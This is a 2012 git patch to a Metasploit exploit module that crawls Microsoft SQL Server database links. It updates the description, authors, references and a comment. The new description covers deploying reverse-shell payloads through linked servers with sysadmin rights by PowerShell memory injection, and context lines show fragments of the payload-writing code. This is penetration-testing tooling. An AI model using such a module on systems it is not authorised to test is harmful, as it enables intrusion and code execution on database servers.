From 0246e921c5018bd751d76b799e051a2ef067f25a Mon Sep 17 00:00:00 2001 From: nullbind Date: Mon, 5 Nov 2012 12:45:54 -0600 Subject: [PATCH] style, ref, desc, and author updates --- .../windows/mssql/mssql_linkcrawler.rb | 30 ++++++++++++++----- 1 file changed, 22 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index a5c846af6a..9f37d7c388 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -7,21 +7,35 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report include Msf::Exploit::CmdStagerVBS - #include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server - Database Link Crawler', - 'Description' => %q{When provided credentials, this module will crawl - SQL Server database links and identify links configured with sysadmin privileges.}, + 'Description' => %q{This module can be used to crawl MS SQL Server + database links and deploy metasploit payloads through links configured + with sysadmin privileges using a valid SQL Server Login. If you are + attempting to obtain multiple reverse shells using this module we + recommend setting the "DisablePayloadHandler" advanced option to "true", + and setting up a multi/handler to run in the background as a job to + support multiple incoming shells. If you are interested in deploying + payloads to spefic servers this module also supports that functionality + via the "DEPLOYLIST" option. Currently, the module is capable of + delivering payloads to both 32bit and 64bit Windows systems via + powershell memory injection methods based on Matthew Graeber's work. + As a result, the target server must have powershell installed. + By default, all of the crawl information is saved to a CSV formatted + log file and MSF loot so that the tool can also be used for auditing + without deploying payloads.}, 'Author' => [ - 'Antti Rantasaari ', - 'nullbind ' + 'Antti Rantasaari ', + 'Scott Sutherland "nullbind" ' ], - 'Platform' => [ 'Windows' ], + 'Platform' => [ 'win' ], 'License' => MSF_LICENSE, - 'References' => [[ 'URL', 'http://www.netspi.com/' ]], + 'References' => [[ 'URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'], + ['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'], + ['URL','http://www.exploit-monday.com/2011_10_16_archive.html']], 'Platform' => 'win', 'DisclosureDate' => 'Jan 1 2000', 'Targets' => @@ -473,7 +487,7 @@ $winFunc::CreateThread(0,0,$x,0,0,0)" # Write base64 encoded powershell payload to temp file # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations - # Also, line number tracking was added so that duplication lines causes by nested linked + # Also, line number tracking was added so that duplication lines caused by nested linked # queries could be found and removed. print_status("Deploying payload...") linenum = 0